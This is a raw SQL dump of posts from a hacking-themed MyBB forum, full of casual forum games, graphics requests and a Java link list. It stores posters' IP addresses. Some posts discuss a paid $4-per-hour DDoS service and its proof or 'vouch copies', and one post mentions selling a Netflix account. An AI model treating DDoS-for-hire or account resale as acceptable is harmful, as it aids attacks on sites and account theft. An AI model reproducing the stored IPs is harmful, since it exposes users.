patient because I need to get in contact with GRONGamer61. [/quote] Umm, doesn\'t GRONgamer61 have to update the thread with his proof of DDoS? [/quote] Didn\'t you request a vouch copy? Did you get it yet? O_o. I received mine and posted my vouch. But I have no proof for now..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '102ef5676206b55197fc7cb15b3663a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2480', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348454639', 'Forgot to mention about the font color. I don\'t really like it. I would appreciate if you made a couple userbars (animated) with a different font color, font, and icon. But I\'m sorry for being so picky. I know you\'re busy and all...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1682d1e6cfceb3859397a55d437e38d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2481', '398', '2479', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1348455534', '[quote=\'iTzIpod\' pid=\'2479\' dateline=\'1348454032\'] [quote=\'t3h jok3r\' pid=\'2475\' dateline=\'1348453097\'] [quote=\'iTzIpod\' pid=\'2472\' dateline=\'1348448441\'] [quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\'] Proof please (Picture/Video). [/quote] I can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61. [/quote] Umm, doesn\'t GRONgamer61 have to update the thread with his proof of DDoS? [/quote] Didn\'t you request a vouch copy? Did you get it yet? O_o. I received mine and posted my vouch. But I have no proof for now.. [/quote] He didn\'t tell me when he was going to DDoS the site so I don\'t know if he really took down the site or not, in other words I didn\'t receive my vouch copy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd7909d28d526a227e72355030e797253', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2482', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1348455583', 'GRONgamer61', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4cb78f7af9075fc83528ecd30671c474', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2483', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1348455606', '21. Go go go go UP :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'be844a6419dff9975c516757dd98b33d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2484', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '1', 't3h jok3r', '1348455631', 'I agree and today I went through a huge loss because LH was down.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c50e2c1543e7d75e76e9a6b616d23977', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2485', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1348455657', '/me laughs at itzipod for being a copy cat.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '472d356fd53b58c4825a2c96654e5611', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2486', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1348455671', 'Banned for being a spammer ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5df5f63fe1094fe06d952eba54743d9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2487', '486', '2353', '56', 'RE: Guess how many?', '0', '1', 't3h jok3r', '1348455685', 'Damn, Lol I didn\'t think of that much.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '72fe392f1aa5e67b01b2e8a20bdb65b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2488', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348455736', 'Then you destroy the whole website by making a small mistake. I wish I get my new PC before wednesday.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3bb80e1f8f69e180b72153b774392956', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2489', '484', '2345', '4', 'RE: Slender Man here.', '0', '5', 'Timmy', '1348455821', 'Welcome to L33THacking bro', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '75a5350791c2a18bc984bc13a066b714', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2490', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '5', 'Timmy', '1348455853', 'Awesome cant wait for the awards plugin to be back.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '836bbd24923539a275fc29e25ae9f7b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2491', '486', '2353', '56', 'RE: Guess how many?', '0', '5', 'Timmy', '1348455909', 'I thought they were 21 but too off.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9cc56d48171fa45686fbf1e5efda462a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2531', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '61', 'NXK', '1348497554', 'Size: Signature Colour Scheme: Any Render/Image: Aby thing you\'d like Text: NXk Anything else: I just want a signature, I\'m not good at making them so if you could help me out that would be nice. I don\'t mind what it looks like you can choose and do whatever you\'d like.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'a51787e8bef385cf34166c5d6b72ca13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2532', '484', '2345', '4', 'RE: Slender Man here.', '0', '61', 'NXK', '1348497659', 'Welcome sir, I hope you stay active and HQ here! Aslong as you follow the rules everything should be just fine for you here. Enjoy!', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '0797b12de6513cda3955187d9043dd4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2493', '499', '2411', '7', 'RE: 1 Month', '0', '5', 'Timmy', '1348456069', 'Congratz on LH for a month', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '23c0eb8645f8e4ffe7d46bed2038c859', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2494', '488', '2355', '8', 'RE: What are you listening to?', '0', '5', 'Timmy', '1348456164', 'http://www.youtube.com/watch?v=dTI0KDuQl_4&feature=g-music Mercy its a nice song', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0324de50d859ac13f8a1eaa88000cfe1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2495', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '5', 'Timmy', '1348456315', 'Name: Timmy Age: 16 Username: Timmy Profile Link: http://l33thacking.net/user-5.html Are you Unique?: Yes Are you HQ?: Yes Why do you wish to get into our group?: I want to help LH become popular and i think this is right group to be in Will you do to contribute to Unique?: Yes i will.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0d176c4d2cbb541c92b503c232ed795f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2496', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '5', 'Timmy', '1348456401', 'Your outcome was good even thouh you followed a tutorial your result was good.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '672ddae8a5f190d6e31e639fb487ae9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2497', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348456445', 'Try adding him on Skype. He is usually on. Unless he is busy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4eb5ebd81d2a43dfc2e415ee323fe64b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2498', '439', '2444', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348456489', '[quote=\'iTzIpod\' pid=\'2444\' dateline=\'1348277273\'] [quote=\'t3h jok3r\' pid=\'2432\' dateline=\'1348274288\'] 1. Where are the group requirements? 2. Where are the userbar and the ficon images? [/quote] Should I just delete the thread instead? And like remake it after? Since I am very busy these days.. -.- [/quote] Dude it\'s not hard to do what I\'m asking you to do. NVM, I edited them for you.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '92b6c07adfff3efcb8fd733d005db689', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2499', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1348456501', 'tflix account Accidently copied and pasted that. Was selling a Netflix Account to a customer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1fce52d66cbfdf5c47e6b11db47ef488', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2500', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1348456540', '22 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8faebd8ab9ac8499704fadf6250130c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2501', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1348456617', 'My posts per day ratio is going down.. It was 23 before and now it\'s 18.. I\'m going inactive every hour or so. I need to boost it! :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2c8e5f3831b3cd4515ef16bde0b7da6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2502', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1348456650', '/me laughs at t3h jok3r for laughing at iTzIpod for being a copy cat.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1629d1a7a937b8f1859815b52c58d3f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2503', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1348456694', 'Banned for not being a spammer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '867d2f04a5b9e47ea5c73ae62735ffd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2504', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348456743', 'Granted. But it broke again. Muahahhhaahaha. I wish I was a good GFX Designer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '24f880b08927cd7f888b115b0a2e3269', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2505', '486', '2353', '56', 'RE: Guess how many?', '0', '82', 'iTzIpod', '1348456802', 'Rofl. I only guessed 32 :p Forgot that there were other combinations.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c957a34436d061d334d6a21f1827c5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2506', '499', '2411', '7', 'RE: 1 Month', '0', '82', 'iTzIpod', '1348456861', 'Thank you Timmy. And congratulations on 100 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6c303b9d3fd37747491c634b6599370', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2507', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1348456939', 'That song is alright. :p I personally don\'t like it. But different people = different opinion. I\'m listening to Owl City - Good Time', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee46671c0883cbb8177e80f2c9f55183', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2508', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348457037', 'Thanks. And I fixed one of the questions. Last one didn\'t really make sense. Sorry. Fixed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0fe6290b2572f214a5a306afc0216858', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2509', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '82', 'iTzIpod', '1348457125', 'Not really. I didn\'t like it :p Looks too plain. And the background is terrible. I couldn\'t find the render. I wanted to make mine look just like the Sample one. But my results failed and were inaccurate :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '006d537cb950c23a1c128c12f2bc9401', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2510', '487', '2504', '56', 'RE: Corrupt a wish', '0', '2', 'Apathy', '1348457164', '[quote=\'iTzIpod\' pid=\'2504\' dateline=\'1348456743\'] Granted. But it broke again. Muahahhhaahaha. I wish I was a good GFX Designer. [/quote] Then people would always want free designs. (true story happend to me) ;) I wish I could read minds.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '1de99838281b2be4870b3cc1f5495fe0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2511', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348457282', 'Granted. But one day, you will receive a massive headache for all of the things you have read. I wish I could go to sleep right now for school tomorrow -.- (11:27 PM) I took 1 sip of coffee from a Tim Hortons cup today and now can\'t sleep..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df77205787fd89f60ae817716afec50b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2512', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '2', 'Apathy', '1348457287', 'Awesome about the rewards. I get to give them xD and ya it sucked that we were down.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'ef070be41a59dd6f1c7c4813fe3cd74f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2513', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '2', 'Apathy', '1348457342', 'Lol, nice share thanks. :)', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'fb7da18707aa2c36d5db9b5e754befcf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2514', '487', '2354', '56', 'RE: Corrupt a wish', '0', '2', 'Apathy', '1348457403', 'You did not wish anything?', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'b23be52809e8da514463504b63ee5a65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2515', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '82', 'iTzIpod', '1348457568', 'No problem. Enjoy! And good luck making the signature. ;) Post your outcome please.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '579a7370a8abf1c957b3363acae7e02f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2516', '487', '2514', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348457698', '[quote=\'Apathy\' pid=\'2514\' dateline=\'1348457403\'] You did not wish anything? [/quote] [quote=\'iTzIpod\' pid=\'2511\' dateline=\'1348457282\'] Granted. But one day, you will receive a massive headache for all of the things you have read. [b]I wish I could go to sleep right now for school tomorrow -.- (11:27 PM) I took 1 sip of coffee from a Tim Hortons cup today and now can\'t sleep..[/b] [/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '17bd36483ff33df687c3b19fd6761833', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2517', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348458597', 'No problem. People learn from mistakes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bb47b01094ab44345dff26ff60bdb895', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2518', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348459527', 'Granted but if you sleep early, you will get long nightmares. I wish I could start earning something from LH because I\'m investing a lot and earning nothing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '898f8ecb403e0013fa9e5261d390a214', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2519', '487', '2518', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348459916', '[quote=\'t3h jok3r\' pid=\'2518\' dateline=\'1348459527\'] Granted but if you sleep early, you will get long nightmares. I wish I could start earning something from LH because I\'m investing a lot and earning nothing. [/quote] Granted. You are earning 20 cents/day. I wish I could get good grades in school for a good future.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c1fdec019d4363a3d4f139dfbb8face4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2520', '504', '0', '7', 'Almost there!', '0', '82', 'iTzIpod', '1348460343', 'L33tHacking is almost there. We almost have 2,500 posts and 500 threads! Lets try to obtain those milestones.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd5e7bcc9d9a609e6b647f0680cecb434', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2521', '504', '2520', '7', 'RE: Almost there!', '0', '1', 't3h jok3r', '1348460760', 'We sure are. Hopefully those 500 are this week.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fbae46c09a1a1c6140cb975467c507e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2522', '504', '2520', '7', 'RE: Almost there!', '0', '4', 'Triple H', '1348460803', 'I\'m on it. Going to post some threads today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '86f4f87db4bad74a29097d7f9a47fc6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2523', '505', '0', '53', 'Complete Java Guide', '0', '4', 'Triple H', '1348460907', '[b][color=#FF0000]Official Website:[/color][/b] http://www.java.com/en/ [color=#FF0000][u][b]What is Java?[/b][/u][/color] Java is a programming language originally developed by James Gosling at Sun Microsystems (which is now a subsidiary of Oracle Corporation) and released in 1995 as a core component of Sun Microsystems\' Java platform. The language derives much of its syntax from C and C++ but has a simpler object model and fewer low-level facilities. Java applications are typically compiled to bytecode (class file) that can run on any Java Virtual Machine (JVM) regardless of computer architecture. Java is a general-purpose, concurrent, class-based, object-oriented language that is specifically designed to have as few implementation dependencies as possible. It is intended to let application developers \"write once, run anywhere\". Java is currently one of the most popular programming languages in use, and is widely used from application software to web applications. [color=#FF0000][b]Java E-books:[/b][/color] http://media.techtarget.com/tss/static/b...B3rdEd.pdf http://www.informit.com/library/library....a2_24hours http://java.sun.com/docs/books/jni/ http://java.sun.com/docs/books/jls/secon...C.doc.html http://java.sun.com/developer/onlineTrai...index.html http://www.javaa.com/100/high.zip http://www.brpreiss.com/books/opus5/html/book.html http://cs.armstrong.edu/liang/intro5e/Su...clipse.pdf http://www.brpreiss.com/books/opus5/html/book.html http://www.roxie.org/books/bleeding/tabl...tents.html [color=#FF0000][b]Useful Websites:[/b][/color] http://www.codeproject.com/KB/java/ http://www.info4java.com/ http://www.beginner-java-tutorial.com/ http://www.javapassion.com/javaintro/ http://java.sun.com/new2java/index.jsp http://www.webpelican.com/internet-programming-1/ http://home.cogeco.ca/~ve3ll/jatutor0.htm http://www.cafeaulait.org/ http://java.sun.com/developer/onlineTraining/JavaIntro/ http://java.sun.com/developer/onlineTrai...index.html http://java.sun.com/developer/onlineTrai...asicJava2/ http://www.extropia.com/tutorials/java/toc.html http://java.sun.com/docs/books/tutorial/ http://www.cafeaulait.org/javatutorial.html http://www.javacoffeebreak.com/tutorials/index.html http://www.cs.cmu.edu/~jch/java/optimization.html http://www.apl.jhu.edu/~hall/java/Swing-...nting.html http://www.javacoffeebreak.com/java101/java101.html http://java.sun.com/developer/technicalA.../1.4regex/ http://www.mandomartis.com/onlinecourses/courses.html http://java.sun.com/developer/onlineTrai...index.html http://www.cs.drexel.edu/~shartley/ConcP...index.html http://www.artima.com/designtechniques/i...ation.html http://www.apl.jhu.edu/~hall/java/Java2D-Tutorial.html http://java.sun.com/developer/onlineTrai...tract.html http://www.javaworld.com/javaworld/jw-12...ckets.html http://www.acm.org/crossroads/xrds4-2/serial.html http://java.sun.com/developer/onlineTrai...g/JDCBook/ http://www.apl.jhu.edu/~hall/java/CGI-with-Java.html http://www.vijaymukhi.com/vmis/java.html http://java.sun.com/docs/books/tutorial/deployment/jar/ 